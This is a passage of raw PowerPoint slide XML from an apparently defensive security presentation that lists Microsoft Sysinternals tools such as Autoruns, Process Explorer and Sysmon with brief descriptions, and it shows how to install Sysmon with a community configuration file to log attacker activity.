            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>https://docs.microsoft.com/en-us/sysinternals/</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3800233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FA03C-CE00-194E-95C2-1F6AB577BC36}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="288640" y="167698"/>
            <a:ext cx="10515600" cy="622011"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Sysinternals</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>:  Security Tools</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Content Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C8EA970F-2219-0243-ACB6-57F15E3EDDB7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="half" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="639620" y="1004743"/>
            <a:ext cx="5181600" cy="4351338"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>AccessChk</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>This tool shows you the accesses the user or group you specify has to files, Registry keys or Windows services.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>AccessEnum</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>This simple yet powerful security tool shows you who has what access to directories, files and Registry keys on your systems. Use it to find holes in your permissions.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>Autologon</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>Bypass password screen during logon.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:hlinkClick r:id="rId5"/>
              </a:rPr>
              <a:t>Autoruns</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>See what programs are configured to startup automatically when your system boots and you log in. Autoruns also shows you the full list of Registry and file locations where applications can configure auto-start settings.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:hlinkClick r:id="rId6"/>
              </a:rPr>
              <a:t>LogonSessions</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>List active logon sessions</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:hlinkClick r:id="rId7"/>
              </a:rPr>
              <a:t>Process Explorer</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>Find out what files, registry keys and other objects processes have open, which DLLs they have loaded, and more. This uniquely powerful utility will even show you who owns each process.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:hlinkClick r:id="rId8"/>
              </a:rPr>
              <a:t>PsExec</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>Execute processes with limited-user rights.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:hlinkClick r:id="rId9"/>
              </a:rPr>
              <a:t>PsLoggedOn</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>Show users logged on to a system.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Content Placeholder 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{05ADA459-E6F9-F84F-8939-7F423392AD43}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="half" idx="2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6370782" y="1004743"/>
            <a:ext cx="5181600" cy="5499966"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:hlinkClick r:id="rId10"/>
              </a:rPr>
              <a:t>PsLogList</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>Dump event log records.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:hlinkClick r:id="rId11"/>
              </a:rPr>
              <a:t>PsTools</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>The </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1"/>
              <a:t>PsTools</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t> suite includes command-line utilities for listing the processes running on local or remote computers, running processes remotely, rebooting computers, dumping event logs, and more.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:hlinkClick r:id="rId12"/>
              </a:rPr>
              <a:t>Rootkit Revealer</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>RootkitRevealer is an advanced rootkit detection utility.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:hlinkClick r:id="rId13"/>
              </a:rPr>
              <a:t>SDelete</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>Securely overwrite your sensitive files and cleanse your free space of previously deleted files using this DoD-compliant secure delete program.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:hlinkClick r:id="rId14"/>
              </a:rPr>
              <a:t>ShareEnum</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>Scan file shares on your network and view their security settings to close security holes.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:hlinkClick r:id="rId15"/>
              </a:rPr>
              <a:t>ShellRunas</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>Launch programs as a different user via a convenient shell context-menu entry.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:hlinkClick r:id="rId16"/>
              </a:rPr>
              <a:t>Sigcheck</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>Dump file version information and verify that images on your system are digitally signed.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:hlinkClick r:id="rId17"/>
              </a:rPr>
              <a:t>Sysmon</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>Monitors and reports key system activity via the Windows event log.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="TextBox 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4F27D714-3B0A-F641-B668-54EE08914144}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="103909" y="1496291"/>
            <a:ext cx="184731" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Rectangle 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B7DE3726-B043-2840-A465-D7FD71FDEB15}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="639620" y="3117273"/>
            <a:ext cx="5181600" cy="245384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78F6E08-BBA6-5B4F-B9F9-705BF9DA3B6A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6370780" y="6089073"/>
            <a:ext cx="5181600" cy="6966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345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A0ECE-222E-7246-A42B-70CA0E7D6459}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="245918" y="183861"/>
            <a:ext cx="10515600" cy="682770"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>A few tools worth using…..</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{73CBB20F-7E0F-CF4C-8EBC-86AE98AE4280}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="536864" y="866631"/>
            <a:ext cx="10515600" cy="824057"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Sysinternals</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> has many tools, some more useful for security than others.  These are some I think are most useful (Personal Opinion)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Rectangle 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B3304E98-A235-7042-B245-BF8BFB2E9A27}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="391391" y="1690688"/>
            <a:ext cx="4731327" cy="5078313"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>Autoruns</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>See what programs are configured to startup automatically when your system boots and you log in. Autoruns also shows you the full list of Registry and file locations where applications can configure auto-start settings.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>LogonSessions</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>List active logon sessions</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>Process Explorer</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Find out what files, registry keys and other objects processes have open, which DLLs they have loaded, and more. This uniquely powerful utility will even show you who owns each process.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:hlinkClick r:id="rId5"/>
              </a:rPr>
              <a:t>Sysmon</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Monitors and reports key system activity via the Windows event log.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Rectangle 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{18A883FD-D9E7-B64A-8DE2-38E0427BD32C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5704609" y="1690688"/>
            <a:ext cx="6096000" cy="5909310"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:hlinkClick r:id="rId6"/>
              </a:rPr>
              <a:t>AccessChk</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>This tool shows you the accesses the user or group you specify has to files, Registry keys or Windows services.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:hlinkClick r:id="rId7"/>
              </a:rPr>
              <a:t>AccessEnum</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>This simple yet powerful security tool shows you who has what access to directories, files and Registry keys on your systems. Use it to find holes in your permissions.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:hlinkClick r:id="rId8"/>
              </a:rPr>
              <a:t>PsFile</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>See what files are opened remotely.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:hlinkClick r:id="rId9"/>
              </a:rPr>
              <a:t>ShareEnum</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Scan file shares on your network and view their security settings to close security holes.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:hlinkClick r:id="rId10"/>
              </a:rPr>
              <a:t>Streams</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Reveal NTFS alternate streams.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:hlinkClick r:id="rId11"/>
              </a:rPr>
              <a:t>TCPView</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Active socket command-line viewer.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:hlinkClick r:id="rId12"/>
              </a:rPr>
              <a:t>Whois</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>See who owns an Internet address.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="871852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D5C55-94DD-EE4A-A6D9-7218B9BC5914}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="516228" y="170399"/>
            <a:ext cx="10515600" cy="510638"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Installing Sysmon</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{876D33D0-37B4-3A49-A2FB-94F2BC790810}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="619259" y="859710"/>
            <a:ext cx="10515600" cy="3192745"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>If you don’t have access to an EDR tool, Sysmon can help you detect attacker activity beyond what is capable with standard logging.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>https://docs.microsoft.com/en-us/sysinternals/downloads/sysmon</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>You need a config file, a good starting point is the one provided by </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1"/>
              <a:t>SwiftOnSecurity</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>:  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>https://github.com/SwiftOnSecurity/sysmon-config</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:highlight>
                  <a:srgbClr val="C0C0C0"/>
                </a:highlight>
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>sysmon.exe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:highlight>
                  <a:srgbClr val="C0C0C0"/>
                </a:highlight>
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:highlight>
                  <a:srgbClr val="C0C0C0"/>
                </a:highlight>
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>accepteula</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:highlight>
                  <a:srgbClr val="C0C0C0"/>
                </a:highlight>
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:highlight>
                  <a:srgbClr val="C0C0C0"/>
                </a:highlight>
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>i</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:highlight>
                  <a:srgbClr val="C0C0C0"/>
                </a:highlight>
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:highlight>
                  <a:srgbClr val="C0C0C0"/>
                </a:highlight>
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>sysmonconfig-export.xml</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0">
              <a:highlight>
                <a:srgbClr val="C0C0C0"/>
              </a:highlight>
              <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>Logs located at:  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
              </a:rPr>
              <a:t>Applications and Services Logs/Microsoft/Windows /Sysmon/Operational </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>(probably going to want to increase log size)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
